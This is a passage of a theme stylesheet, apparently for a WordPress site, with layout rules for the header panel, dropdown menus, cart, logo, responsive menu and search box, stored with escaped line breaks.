{\r\n\tdisplay:none;\r\n}\r\n.top_panel_fixed .top_panel_style_5 .contact_logo {\r\n\tfloat: left;\r\n}\r\n.top_panel_fixed .top_panel_middle {\r\n\tmin-height:0;\r\n}\r\n.top_panel_fixed .menu_main_wrap {\r\n\tmargin-top:0;\r\n}\r\n\r\n.admin-bar.top_panel_fixed .top_panel_wrap {\r\n\ttop:32px;\r\n}\r\n\r\n\r\n/* Top panel (top area) */\r\n.top_panel_top {\r\n\tmargin-top:0;\r\n\tborder-bottom: 1px solid;\r\n}\r\n.top_panel_top_contact_area {\r\n\tfloat: left;\r\n\tfont-size: 0.813em;\r\n\tfont-weight: 500;\r\n\tline-height: 2.8em;\r\n\tpadding-top: 0.2em;\r\n}\r\n.top_panel_top_open_hours,\r\n.top_panel_top_contact_phone {\r\n\tfloat:right;\r\n\tmargin-left:1.5em;\r\n\tfont-size: 0.875em;\r\n\tfont-weight: 500;\r\n\tline-height: 2.8em;\r\n}\r\n\r\n.top_panel_top_user_area {\r\n}\r\n.top_panel_top_socials {\r\n\tfloat:right;\r\n\tmargin-top:1em;\r\n}\r\n\r\n.top_panel_top_search,\r\n.menu_user_nav {\r\n\tfloat:left;\r\n\tmargin-top:1em;\r\n}\r\n.top_panel_top_search {\r\n\tpadding-top: 0.2em;\r\n\tmargin-right: 2em;\r\n}\r\n.top_panel_top_socials {\r\n\tmargin-left:3em;\r\n}\r\n.top_panel_wrap .sc_socials a:before,\r\n.top_panel_wrap .sc_socials [class*=\"icon-\"]:before {\r\n\tmargin-right:0;\r\n}\r\n\r\n.top_panel_wrap ul {\r\n\tmargin:0;\r\n\tpadding:0;\r\n\tlist-style-type:none;\r\n}\r\n.top_panel_wrap li {\r\n\tmargin-bottom: 0;\r\n\tposition:relative;\r\n}\r\n.top_panel_wrap li li > a {\r\n\tposition:relative;\r\n\tdisplay:block;\r\n\tpadding:0.593em 0.7em;\r\n}\r\n\r\n.top_panel_wrap li li.menu-item-has-children > a:after {\r\n\tcontent: '\\e836';\r\n\tfont-family: 'fontello';\r\n\tposition:absolute;\r\n\tright:8px;\r\n\ttop:50%;\r\n\t-webkit-transform: translateY(-50%);\r\n\t-moz-transform: translateY(-50%);\r\n\ttransform: translateY(-50%);\r\n}\r\n.responsive_menu .top_panel_wrap li li.menu-item-has-children > a::after {\r\n\tdisplay:none;\r\n}\r\n\r\n/* User menu */\r\n.menu_user_nav > li {\r\n\tmargin-left:1.5em;\r\n}\r\n.menu_user_nav > li a {\r\n\tfont-weight:400;\r\n}\r\n.menu_user_nav > li > a {\r\n\tdisplay: block;\r\n\tpadding: 1em 0 1.25em;\r\n}\r\n.menu_user_nav > li li {\r\n\tline-height:1.5em;\r\n}\r\n.menu_user_nav > li ul:not(.cart_list) {\r\n\twidth:12em;\r\n\tpadding: 0;\r\n\tborder:1px solid #ddd;\r\n}\r\n.menu_user_nav > li.menu_user_bookmarks ul {\r\n\twidth:15em;\r\n}\r\n.menu_user_nav > li > ul {\r\n\tleft:0;\r\n\ttop:3.7em;\r\n}\r\n.menu_user_nav > li > ul ul {\r\n\tleft:12em;\r\n\tmargin-left:4px;\r\n\ttop:-0.5em;\r\n}\r\n.menu_user_nav > li > ul ul.submenu_left {\r\n\tleft:-12em;\r\n\tmargin-left:-1px;\r\n}\r\n\r\n.menu_user_nav > li.menu_user_controls .user_avatar {\r\n\tdisplay: inline-block;\r\n\tborder: 1px solid #ddd;\r\n\tmargin-right: 0.4em;\r\n\toverflow: hidden;\r\n\tvertical-align: middle;\r\n\t-webkit-border-radius: 50%;\r\n\t-moz-border-radius: 50%;\r\n\tborder-radius: 50%;\r\n\twidth: 1em;\r\n\theight: 1em;\r\n\tline-height:1em;\r\n}\r\n\r\n/* Main and user menu */\r\n.menu_main_nav_area {\r\n\tposition:relative;\r\n\tz-index:1000;\r\n\tdisplay:none;\r\n}\r\n.menu_show .menu_main_nav_area {\r\n\tdisplay:block;\r\n}\r\n\r\n\r\n.menu_main_wrap .sc_button{\r\n\tdisplay: block;\r\n\tfloat: right;\r\n\tmargin-top: 2.2em;\r\n\tfont-size: 0.938em;\r\n\tpadding: 0.67em 0.85em 0.6em 0.85em;\r\n\tmargin-left: 1.6em;\r\n}\r\n\r\n.menu_user_nav > li:first-child {\r\n\tmargin-left:0;\r\n}\r\n\r\n.menu_main_nav > li {\r\n\tposition:relative;\r\n\tfloat:left;\r\n\tz-index:20;\r\n\r\n}\r\n\r\n.menu_main_nav > li+li { z-index:19; }\r\n.menu_main_nav > li+li+li { z-index:18; }\r\n.menu_main_nav > li+li+li+li { z-index:17; }\r\n.menu_main_nav > li+li+li+li+li { z-index:16; }\r\n.menu_main_nav > li+li+li+li+li+li { z-index:15; }\r\n.menu_main_nav > li+li+li+li+li+li+li { z-index:14; }\r\n.menu_main_nav > li+li+li+li+li+li+li+li { z-index:13; }\r\n.menu_main_nav > li+li+li+li+li+li+li+li+li { z-index:12; }\r\n.menu_main_nav > li+li+li+li+li+li+li+li+li+li { z-index:11; }\r\n.menu_user_nav > li { z-index:30; }\r\n.menu_user_nav > li+li { z-index:29; }\r\n.menu_user_nav > li+li+li { z-index:28; }\r\n.menu_user_nav > li+li+li+li { z-index:27; }\r\n.menu_user_nav > li+li+li+li+li { z-index:26; }\r\n.menu_user_nav > li+li+li+li+li+li { z-index:25; }\r\n.menu_user_nav > li+li+li+li+li+li+li { z-index:24; }\r\n.menu_user_nav > li+li+li+li+li+li+li+li { z-index:23; }\r\n.menu_user_nav > li+li+li+li+li+li+li+li+li { z-index:22; }\r\n.menu_user_nav > li+li+li+li+li+li+li+li+li+li { z-index:21; }\r\n.menu_user_nav > li ul,\r\n.menu_main_nav > li ul {\r\n\tposition:absolute;\r\n\tdisplay:none;\r\n\tz-index:10000;\r\n}\r\n\r\n.menu_main_nav > li > a {\r\n\tdisplay: block;\r\n}\r\n\r\n.menu_main_nav > li ul {\r\n}\r\n.menu_main_nav > li ul {\r\n\twidth:199px;\r\n\tpadding: 1.2em 1.2em 1.8em 1.2em;\r\n\tbox-sizing: border-box;\r\n}\r\n.menu_main_nav > li > ul {\r\n\tleft:0;\r\n\ttop:63px;\r\n}\r\n\r\n.top_panel_style_5 .menu_main_nav > li > ul{\r\n\ttop:46px;\r\n}\r\n\r\n.menu_main_nav > li > ul > li{position: relative;\r\n}\r\n.menu_main_nav > li > ul > li a{\r\n\r\n\tborder-radius:  5px;\r\n\t-webkit-border-radius:  5px;\r\n\t-moz-border-radius:  5px;\r\n\r\n}\r\n.menu_main_nav > li > ul > li{\r\n\tborder-top: 1px solid;\r\n}\r\n\r\n\r\n\t\r\n.menu_main_nav > li > ul ul {\r\n\tleft:179px;\r\n\ttop:-1px;\r\n}\r\n.menu_main_nav > li > ul ul.submenu_left {\r\n\tleft:-217px;\r\n}\r\n.menu_main_nav li a:before {\r\n\tmargin-right:0.5em;\r\n}\r\n\r\n/* Main menu slider */\r\n.menu_main_nav > li#blob {\r\n\tposition: absolute;\r\n\ttop: 0;\r\n\tz-index : 1;\r\n\topacity:0;\r\n}\r\n.menu_main_nav > li.blob_over:not(.current-menu-item):not(.current-menu-parent):not(.current-menu-ancestor):hover,\r\n.menu_main_nav > li.blob_over:not(.current-menu-item):not(.current-menu-parent):not(.current-menu-ancestor).sfHover {\r\n\tbackground-color: transparent;\r\n\t-webkit-box-shadow: none;\r\n\t-moz-box-shadow:    none;\r\n\tbox-shadow:         none;\r\n}\r\n\r\n/* Currency */\r\n.menu_user_nav > li.menu_user_currency > a {\r\n\tpadding-left:1.6em;\r\n\tpadding-right:0.2em;\r\n}\r\n\r\n/* Bookmarks */\r\n.menu_user_nav > li.menu_user_bookmarks li > a {\r\n\tposition:relative;\r\n}\r\n\r\n.menu_user_nav > li.menu_user_bookmarks .bookmarks_add {\r\n\tborder-bottom:1px solid rgba(0,0,0, 0.5);\r\n}\r\n.menu_user_nav > li.menu_user_bookmarks .bookmarks_delete {\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop:50%;\r\n\tmargin-top:-0.5em;\r\n\tmargin-right:0.5em;\r\n\twidth:1em;\r\n\theight:1em;\r\n\tline-height:1em;\r\n\tfont-size:1.25em;\r\n}\r\n\r\n/* Cart button */\r\n.top_panel_style_3 .top_panel_cart_button,\r\n.top_panel_style_4 .top_panel_cart_button {\r\n\tdisplay:block;\r\n\tpadding-left:1.5em !important;\r\n\tpadding-right:1.5em !important;\r\n}\r\n.top_panel_middle .contact_cart {\r\n\tposition:relative;\r\n}\r\n.top_panel_middle .sidebar_cart {\r\n\tposition:absolute;\r\n\ttop: 4.5em;\r\n\tleft:0;\r\n\tz-index:1000;\r\n\tdisplay:none;\r\n\tfloat:none;\r\n\ttext-align:left;\r\n\tborder: 1px solid #eee;\r\n}\r\n.top_panel_icon {\r\n\tpadding:0;\r\n}\r\n.top_panel_icon .sidebar_cart {\r\n\ttop: 3.5em;\r\n\tleft:-0.7em;\r\n}\r\n.top_panel_style_5 .top_panel_icon .sidebar_cart,\r\n.top_panel_style_6 .top_panel_icon .sidebar_cart,\r\n.top_panel_style_7 .top_panel_icon .sidebar_cart,\r\n.top_panel_style_8 .top_panel_icon .sidebar_cart {\r\n\tleft:auto;\r\n\tright: -1em;\r\n}\r\n.top_panel_icon.search_wrap,\r\n.top_panel_inner_style_5 .menu_main_responsive_button,\r\n.top_panel_inner_style_6 .menu_main_responsive_button,\r\n.top_panel_inner_style_7 .menu_main_responsive_button {\r\n\twidth: 2.2857em;\r\n\theight: 2.2857em;\r\n\tline-height: 2.2857em;\r\n\t-webkit-border-radius: 1.15em;\r\n\t-moz-border-radius: 1.15em;\r\n\tborder-radius: 1.15em;\r\n\t    font-size: 1.4em;\r\n}\r\n.top_panel_icon.search_wrap.search_state_opened {\r\n\twidth: 8em;\r\n}\r\n.top_panel_icon.search_wrap .search_submit {\r\n\tline-height: 2.2857em;\r\n\tfont-size: 0.7em;\r\n}\r\n.top_panel_icon .contact_cart_label,\r\n.top_panel_icon .contact_cart_totals {\r\n\tdisplay:none;\r\n}\r\n.top_panel_icon .contact_icon {\r\n\tdisplay:inline-block;\r\n\ttext-align:center;\r\n}\r\n.top_panel_icon .contact_icon:before {\r\n\tmargin-right:0;\r\n}\r\n.top_panel_icon.menu_main_cart {\r\n\tposition:relative;\r\n}\r\n.top_panel_icon .contact_icon {\r\n\twidth: 2.2857em;\r\n\theight: 2.2857em;\r\n\tline-height: 2.2857em;\r\n}\r\n.top_panel_icon.menu_main_cart .contact_icon {\r\n\t-webkit-border-radius: 1.15em;\r\n\t-moz-border-radius: 1.15em;\r\n\tborder-radius: 1.15em;\r\n}\r\n\r\n\r\n/* Logo in the header */\r\n.top_panel_wrap .logo {\r\n\tmargin: 2em 0 1em 0;\r\n}\r\n.top_panel_wrap .logo_main {\r\n\tmax-height:100px;\r\n\twidth:auto;\r\n}\r\n.logo a {\r\n\tdisplay:inline-block;\r\n}\r\n.logo img {\r\n\tfloat:left;\r\n\twidth: auto;\r\n}\r\n.logo_text,\r\n.logo_slogan {\r\n\tfloat:left;\r\n\ttext-align:left;\r\n}\r\n.logo_slogan {\r\n\tmargin-top:0.25em;\r\n\tfont-style:italic;\r\n}\r\n.responsive_menu .top_panel_middle .logo,\r\n.menu_relayout .top_panel_middle .logo {\r\n\tmargin-bottom:0 !important;\r\n}\r\n.top_panel_fixed .top_panel_wrap .logo_main {\r\n\tdisplay: none;\r\n}\r\n.top_panel_wrap .logo_fixed {\r\n\tdisplay:none;\r\n\tmax-height:42px;\r\n\twidth:auto;\r\n}\r\n.top_panel_fixed .top_panel_wrap .logo_fixed {\r\n\tdisplay: block;\r\n}\r\n.top_panel_fixed .top_panel_middle .menu_main_wrap {\r\n\tmargin-top:0;\r\n}\r\n\r\n.top_panel_style_5 .top_panel_middle .content_wrap{\r\n\tposition: relative;\r\n\r\n}\r\n\r\n.top_panel_style_5 .social_icon.search_panel{\r\n\tposition: absolute;\r\n\ttop: 0;\r\n\tright: 0;\r\n\r\n}\r\n\r\n\r\n.top_panel_style_5 .top_panel_wrap_inner {\r\n\ttext-align:center;\r\n}\r\n.top_panel_style_5 .contact_logo {\r\n\toverflow:hidden;\r\n}\r\n.top_panel_style_5 .menu_main_wrap {\r\n\tdisplay:inline-block;\r\n\tmargin-top:0 !important;\r\n}\r\n.top_panel_style_5 .menu_main_nav_area,\r\n.top_panel_style_5 .top_panel_icon {\r\n\tdisplay:block;\r\n\tfloat: right;\r\n}\r\n.top_panel_style_5 .top_panel_top_user_area {\r\n\ttext-align:left;\r\n}\r\n\r\n.top_panel_style_6 .menu_main_nav_area,\r\n.top_panel_style_7 .menu_main_nav_area {\r\n\tfloat:none;\r\n}\r\n.top_panel_style_6 .top_panel_icon,\r\n.top_panel_style_7 .top_panel_icon {\r\n\tfloat: right;\r\n}\r\n\r\n\r\n\r\n/* Featured image in the header 7 */\r\n.top_panel_image {\r\n\theight:45em;\r\n\toverflow:hidden;\r\n\tposition:relative;\r\n\tbackground-size:cover;\r\n\tbackground-position:center;\r\n}\r\n.top_panel_image_hover {\r\n\tposition:absolute;\r\n\ttop:0;\r\n\tleft:0;\r\n\tright:0;\r\n\tbottom:0;\r\n\tbackground-color:rgba(2,75,94, 0.8);\r\n}\r\n.top_panel_image_header {\r\n\tposition:absolute;\r\n\tleft:50%;\r\n\ttop:50%;\r\n\tdisplay:block;\r\n\tmax-width:50%;\r\n\ttext-align:center;\r\n\t-webkit-transform:translateX(-50%) translateY(-50%);\r\n\t-moz-transform:translateX(-50%) translateY(-50%);\r\n\ttransform:translateX(-50%) translateY(-50%);\r\n}\r\n.top_panel_image_icon {\r\n\tfont-size: 4em;\r\n\tline-height:1em;\r\n\tmargin-top:1em;\r\n}\r\n\r\n/* Relayout menu */\r\n.menu_relayout .top_panel_style_1 .menu_main_nav_area:after,\r\n.menu_relayout .top_panel_style_2 .menu_main_nav_area:after,\r\n.menu_relayout .top_panel_style_5 .menu_main_nav_area:after,\r\n.menu_relayout .top_panel_style_6 .menu_main_nav_area:after,\r\n.menu_relayout .top_panel_style_7 .menu_main_nav_area:after {\r\n\tcontent:' ';\r\n\tclear: both;\r\n\tdisplay:block;\r\n\twidth:100%;\r\n\theight:0;\r\n}\r\n.menu_relayout .top_panel_style_3 .contact_logo,\r\n.menu_relayout .top_panel_style_3 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_4 .contact_logo,\r\n.menu_relayout .top_panel_style_4 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_6 .contact_logo,\r\n.menu_relayout .top_panel_style_6 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_7 .contact_logo,\r\n.menu_relayout .top_panel_style_7 .menu_main_wrap {\r\n\twidth: 100%;\r\n\ttext-align:center;\r\n}\r\n.menu_relayout .top_panel_style_3 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_4 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_6 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_7 .menu_main_wrap {\r\n\tmargin-top: 0;\r\n}\r\n.menu_relayout .top_panel_style_5 .menu_main_nav_area,\r\n.menu_relayout .top_panel_style_6 .menu_main_nav_area,\r\n.menu_relayout .top_panel_style_7 .menu_main_nav_area {\r\n\tfloat: none !important;\r\n\tdisplay:block !important;\r\n\ttext-align:center;\r\n}\r\n.menu_relayout .top_panel_style_5 .menu_main_nav,\r\n.menu_relayout .top_panel_style_6 .menu_main_nav,\r\n.menu_relayout .top_panel_style_7 .menu_main_nav {\r\n\tdisplay:inline-block;\r\n\ttext-align:left;\r\n}\r\n.menu_relayout .top_panel_style_5 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_6 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_6 .content_wrap,\r\n.menu_relayout .top_panel_style_7 .menu_main_wrap,\r\n.menu_relayout .top_panel_style_7 .content_wrap {\r\n\ttext-align:center;\r\n}\r\n.menu_relayout .top_panel_icon {\r\n\tfloat:none !important;\r\n\tmargin-top: 0;\r\n\tmargin-left: 1em;\r\n\tmargin-right: 1em;\r\n\tdisplay:inline-block !important;\r\n\tvertical-align:top;\r\n}\r\n\r\n\r\n/* Responsive menu */\r\n.menu_main_responsive_button {\r\n\tdisplay:none;\r\n}\r\n.menu_main_responsive_button:before {\r\n\tfont-size:3em;\r\n\tvertical-align:top;\r\n}\r\n.responsive_menu .menu_main_responsive_button {\r\n\tdisplay:inline-block;\r\n}\r\n.responsive_menu .top_panel_middle {\r\n\t/*overflow: hidden;*/\r\n}\r\n.responsive_menu .top_panel_style_1 .menu_main_responsive_button,\r\n.responsive_menu .top_panel_style_2 .menu_main_responsive_button {\r\n\tfont-size:1.5em;\r\n\tdisplay:block;\r\n\tposition:relative;\r\n\tpadding: 1.5em 2em 1.5em 0;\r\n\tmargin:0;\r\n\ttext-align:center;\r\n}\r\n.responsive_menu .top_panel_style_1 .menu_main_responsive_button:before,\r\n.responsive_menu .top_panel_style_2 .menu_main_responsive_button:before {\r\n\tfont-size:inherit;\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop:1.5em;\r\n\theight:1em;\r\n\twidth: 1em;\r\n\tmargin-right:0;\r\n}\r\n.responsive_menu .menu_main_nav_area {\r\n\theight:auto !important;\r\n\tfloat:left;\r\n}\r\n.responsive_menu .menu_main_nav {\r\n\tdisplay:none !important;\r\n}\r\n.responsive_menu .top_panel_middle .content_wrap {\r\n\tposition:relative;\r\n}\r\n.responsive_menu .top_panel_middle .menu_main_wrap {\r\n\tmargin-top:0;\r\n}\r\n\r\n.responsive_menu .top_panel_style_3 .contact_logo,\r\n.responsive_menu .top_panel_style_4 .contact_logo,\r\n.responsive_menu .top_panel_style_5 .contact_logo,\r\n.responsive_menu .top_panel_style_6 .contact_logo,\r\n.responsive_menu .top_panel_style_7 .contact_logo {\r\n\twidth: 100% !important;\r\n}\r\n.responsive_menu .top_panel_style_3 .menu_main_wrap,\r\n.responsive_menu .top_panel_style_4 .menu_main_wrap,\r\n.responsive_menu .top_panel_style_5 .menu_main_wrap,\r\n.responsive_menu .top_panel_style_6 .menu_main_wrap,\r\n.responsive_menu .top_panel_style_7 .menu_main_wrap {\r\n\twidth: 100% !important;\r\n\tposition:static;\r\n}\r\n.responsive_menu .top_panel_style_3 .menu_main_responsive_button,\r\n.responsive_menu .top_panel_style_4 .menu_main_responsive_button {\r\n\tposition:absolute;\r\n\ttop:0;\r\n\tright:0;\r\n\tmargin-top:0;\r\n}\r\n.responsive_menu .top_panel_style_5 .menu_main_nav_area,\r\n.responsive_menu .top_panel_style_6 .menu_main_nav_area,\r\n.responsive_menu .top_panel_style_7 .menu_main_nav_area {\r\n\tfloat: none !important;\r\n\tdisplay:inline-block !important;\r\n}\r\n.responsive_menu .top_panel_style_5 .menu_main_wrap,\r\n.responsive_menu .top_panel_style_6 .menu_main_wrap,\r\n.responsive_menu .top_panel_style_6 .content_wrap,\r\n.responsive_menu .top_panel_style_7 .menu_main_wrap,\r\n.responsive_menu .top_panel_style_7 .content_wrap {\r\n\ttext-align:center;\r\n}\r\n.responsive_menu .top_panel_icon,\r\n.responsive_menu .top_panel_style_5 .menu_main_responsive_button,\r\n.responsive_menu .top_panel_style_6 .menu_main_responsive_button,\r\n.responsive_menu .top_panel_style_7 .menu_main_responsive_button {\r\n\tfloat:none !important;\r\n\tmargin-top: 0;\r\n\tmargin-left: 1em;\r\n\tmargin-right: 1em;\r\n\tdisplay:inline-block !important;\r\n\tvertical-align:top;\r\n}\r\n.responsive_menu .top_panel_style_6 .top_panel_icon,\r\n.responsive_menu .top_panel_style_6 .menu_main_responsive_button,\r\n.responsive_menu .top_panel_style_7 .top_panel_icon,\r\n.responsive_menu .top_panel_style_7 .menu_main_responsive_button {\r\n\tmargin-bottom:0;\r\n}\r\n.responsive_menu .top_panel_style_5 .menu_main_responsive_button:before,\r\n.responsive_menu .top_panel_style_6 .menu_main_responsive_button:before,\r\n.responsive_menu .top_panel_style_7 .menu_main_responsive_button:before {\r\n\tmargin-right:0;\r\n\tfont-size:1em;\r\n}\r\n.responsive_menu .top_panel_style_6 .menu_main_wrap,\r\n.responsive_menu .top_panel_style_7 .menu_main_wrap {\r\n\tmargin-top: 1.5em;\r\n\tmargin-bottom:1.5em;\r\n}\r\n\r\n.menu_main_responsive {\r\n\tdisplay:none;\r\n\ttext-align:left;\r\n\tfont-size:0.9em;\r\n\tpadding: 0 0 1em 0 !important;\r\n}\r\n.responsive_menu .top_panel_style_6 .menu_main_responsive,\r\n.responsive_menu .top_panel_style_7 .menu_main_responsive {\r\n\tpadding: 1em 0 0 !important;\r\n}\r\n.menu_main_responsive ul {\r\n\tmargin: 0.5em 0 0 1.5em;\r\n\tdisplay:none;\r\n}\r\n.menu_main_responsive li.menu-item-has-children {\r\n\tposition:relative;\r\n}\r\n.menu_main_responsive li.menu-item-has-children:after {\r\n\tcontent: '\\e828';\r\n\tfont-family:fontello;\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop:0;\r\n\twidth: 1em;\r\n\theight: 1.2857em;\r\n\tline-height:1.2857em;\r\n\tmargin:0.5em 0.5em 0 0;\r\n}\r\n.menu_main_responsive li.menu-item-has-children.opened:after {\r\n\tcontent: '\\e835';\r\n}\r\n.menu_main_responsive a {\r\n\tfont-size:1.25em;\r\n\tfont-weight:400;\r\n\tdisplay:block;\r\n}\r\n.menu_main_responsive li > a,\r\n.menu_main_responsive li li > a {\r\n\tpadding:0.5em;\r\n}\r\n.menu_main_responsive li.menu-item-has-children > a {\r\n\tpadding-right:2em;\r\n}\r\n\r\n\r\n/* Contact fields */\r\n.top_panel_wrap .contact_field {\r\n\tmargin-top: 2.5em;\r\n}\r\n.top_panel_wrap .contact_field > a > span,\r\n.top_panel_wrap .contact_field > span {\r\n\tdisplay:block;\r\n}\r\n.top_panel_wrap .contact_label {\r\n\tfont-weight:bold;\r\n\tmargin:0.3em 0 0.15em;\r\n}\r\n.top_panel_middle .contact_icon {\r\n\tfloat:left;\r\n\twidth: 3.5em;\r\n\theight: 3.5em;\r\n\tline-height:3.5em;\r\n\tmargin-right:0.5em;\r\n\ttext-align:center;\r\n\t-webkit-border-radius: 50%;\r\n\t-moz-border-radius: 50%;\r\n\tborder-radius: 50%;\r\n}\r\n.top_panel_middle .contact_icon:before {\r\n\tfont-size:1.5em;\r\n\tmargin-right:0;\r\n}\r\n.top_panel_wrap .menu_main_cart .contact_icon:before {\r\n\tfont-size:1em;\r\n}\r\n.top_panel_style_2 .logo,\r\n.top_panel_style_5 .logo {\r\n\ttext-align:center;\r\n}\r\n\r\n.top_panel_style_2 .contact_phone > span + span {\r\n\ttext-align:right;\r\n}\r\n.top_panel_style_2 .contact_phone .contact_icon {\r\n\tfloat:right;\r\n\tmargin-left:0.5em;\r\n\tmargin-right:0;\r\n}\r\n.top_panel_middle .menu_main_wrap {\r\n\ttext-align:right;\r\n}\r\n.top_panel_middle .menu_main_nav_area {\r\n\tdisplay:inline-block;\r\n\ttext-align:left;\r\n\tpadding: 2.8em 2.4em 2.2em 2.4em;\r\n}\r\n.top_panel_style_5 .top_panel_middle .menu_main_nav_area {\r\n\tdisplay:block;\r\n\tpadding: 1.4em 0 1.15em 0;\r\n}\r\n\r\n.top_panel_style_5 .top_panel_top_socials{\r\n\tmargin-top: 0.84em;\r\n\tmargin-left: 0.5em;\r\n}\r\n\r\n\r\n.top_panel_style_5 .search_wrap {\r\nmargin-top: 6px;\r\n}\r\n\r\n.top_panel_style_5  .sc_socials.sc_socials_size_tiny{\r\n\tmargin-right: -0.55em;\r\n}\r\n\r\n.top_panel_style_5 .top_panel_middle .contact_icon,\r\n.top_panel_style_6 .top_panel_middle .contact_icon,\r\n.top_panel_style_7 .top_panel_middle .contact_icon {\r\n\twidth:2.2857em;\r\n\theight: 2.2857em;\r\n\tline-height:2.2857em;\r\n}\r\n.top_panel_style_6 .top_panel_middle,\r\n.top_panel_style_7 .top_panel_middle {\r\n\tmin-height:0;\r\n}\r\n\r\n\r\n/* Search field */\r\n.top_panel_middle .search_wrap {\r\n\tdisplay:none;\r\n}\r\n.menu_show .top_panel_middle .search_wrap {\r\n\tdisplay:block;\r\n}\r\n.search_wrap {\r\n\tposition:relative;\r\n\tmin-width:2.2857em;\r\n}\r\n.search_wrap.search_state_closed:not(.top_panel_icon) {\r\n\tmin-width:0;\r\n\twidth:1.5em;\r\n}\r\n.search_wrap:not(.search_state_fixed) {\r\n\t-webkit-transition: all ease .3s;\r\n\t-moz-transition: all ease .3s;\r\n\t-ms-transition: all ease .3s;\r\n\t-o-transition: all ease .3s;\r\n\ttransition: all ease .3s;\r\n}\r\n.search_wrap .search_submit,\r\n.search_wrap .search_submit:hover {\r\n\tborder:none;\r\n}\r\n\r\n.top_panel_bottom .search_wrap,\r\n.top_panel_bottom .search_wrap .search_submit,\r\n.top_panel_bottom .search_wrap .search_field,\r\n.top_panel_style_4 .search_wrap,\r\n.top_panel_style_4 .search_wrap .search_submit,\r\n.top_panel_style_4 .search_wrap .search_field {\r\n\tpadding:0;\r\n\theight:2.2857em;\r\n\tline-height:2.2857em;\r\n}\r\n\r\n.content .search_wrap,\r\n.content .search_wrap .search_submit,\r\n.content .search_wrap .search_field{\r\n\tpadding:0;\r\n}\r\n\r\n.content .search_wrap .search_submit{\r\n\tpadding: 0.72em 1.85em 0.5em 1.85em;\r\n\tbox-sizing: border-box;\r\n\tborder: 2px solid;\r\n\tfloat: right;\r\n\tmargin-left: 0.5em;\r\n}\r\n\r\n\r\n.content .search_submit:before{\r\n\tcontent: attr(data-title);\r\n\tfont-family: 'Catamaran';\r\n\tfont-weight: 700;\r\n\tfont-size: 15px;\r\n\r\n}\r\n\r\n.top_panel_bottom .search_wrap,\r\n.top_panel_style_4 .search_wrap {\r\n\tfloat:right;\r\n\tz-index:1;\r\n\tpadding-top:1em;\r\n\tpadding-left:1em;\r\n}\r\n.search_wrap form {\r\n\twidth: 100%;\r\n\tpadding-left: 2.29em;\r\n\tposition:relative;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n\r\n.content .search_wrap form{\r\n\tpadding-left: 0;\r\n}\r\n\r\n.top_panel_middle .search_wrap .search_submit {\r\nposition: absolute;\r\n    left: 25px;\r\n    top: 8px;\r\n    width: 1em;\r\n    padding: 0;\r\n    margin: 0;\r\n    text-align: left;\r\n    font-weight: normal;\r\n}\r\n\r\n.search_wrap .search_submit{\r\n\r\n}\r\n\r\n.top_panel_top_search .search_submit {\r\n\ttop:2px;\r\n}\r\n.search_wrap .search_field {\r\n\twidth:100%;\r\n}\r\n.top_panel_top .search_field {\r\n\tpadding:0;\r\n\tmax-width:6em;\r\n}\r\n.search_wrap .search_submit:before {\r\n\tmargin-right:0.35em;\r\n}\r\n.search_wrap.search_style_rounded {\r\n\t-webkit-border-radius: 25px;\r\n\t-moz-border-radius: 25px;\r\n\tborder-radius: 25px;\r\n}\r\n.menu_relayout .top_panel_style_1 .search_wrap,\r\n.menu_relayout .top_panel_style_2 .search_wrap,\r\n.responsive_menu .top_panel_style_1 .search_wrap,\r\n.responsive_menu .top_panel_style_2 .search_wrap {\r\n\tfloat:none;\r\n\tclear:both;\r\n\tmargin: 0;\r\n\tpadding:1.5em 0;\r\n\twidth:100%;\r\n\tmax-width:100%;\r\n\tborder-top: 1px solid rgba(255,255,255,0.1);\r\n}\r\n.responsive_menu .top_panel_style_1 .search_wrap,\r\n.responsive_menu .top_panel_style_2 .search_wrap {\r\n\tmargin-top: 0;\r\n\tpadding-top:0;\r\n\tborder-top:none;\r\n}\r\n.menu_relayout .top_panel_style_4 .search_wrap {\r\n\tfloat:none;\r\n\tclear:both;\r\n\tdisplay:inline-block;\r\n\tvertical-align:top;\r\n\tmargin-top:0;\r\n}\r\n.responsive_menu .top_panel_style_4 .search_wrap {\r\n\tfloat:none;\r\n\tclear:both;\r\n\tmargin: 0;\r\n\tpadding: 0 0 1.5em 1.5em;\r\n}\r\n.responsive_menu .top_panel_style_4 .search_wrap {\r\n\tmax-width:100%;\r\n\tpadding: 1.5em 0;\r\n}\r\n.top_panel_style_5 .search_form_wrap,\r\n.top_panel_style_6 .search_form_wrap,\r\n.top_panel_style_7 .search_form_wrap {\r\n\twidth:100%;\r\n\toverflow:hidden;\r\n}\r\n.top_panel_style_5 .search_results,\r\n.top_panel_style_6 .search_results,\r\n.top_panel_style_7 .search_results {\r\n\ttop: 3.3em !important;\r\n}\r\n.top_panel_icon .search_submit {\r\n\tdisplay:inline-block;\r\n\ttext-align:center;\r\n}\r\n.top_panel_icon .search_submit:before {\r\n\tmargin-right:0;\r\n}\r\n\r\n\r\n\r\n/* Search results */\r\n.search_wrap .search_results {\r\n\tdisplay:none;\r\n\tposition:absolute;\r\n\tz-index:1000;\r\n\tright: 7.7em;\r\n\ttop: 3.8em;\r\n\tbackground-color: #fff;\r\n\tborder: 1px solid #e5e5e5;\r\n\twidth: 270px;\r\n\tpadding:1em;\r\n\tline-height:1.5em;\r\n\ttext-align:left;\r\n\t-webkit-box-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\r\n\t-moz-box-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\r\n\tbox-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\t\r\n}\r\n\r\n\r\n\r\n.top_panel_top .search_results {\r\n\ttop:2.65em;\r\n}\r\n\r\n.top_panel_middle .search_wrap .search_results{\r\n\tright:0em;\r\n}\r\n\r\n.menu_relayout .top_panel_style_3 .search_results {\r\n\tright: auto;\r\n\tleft:0;\r\n}\r\n.menu_relayout .top_panel_style_3 .search_results:after {\r\n\tright: 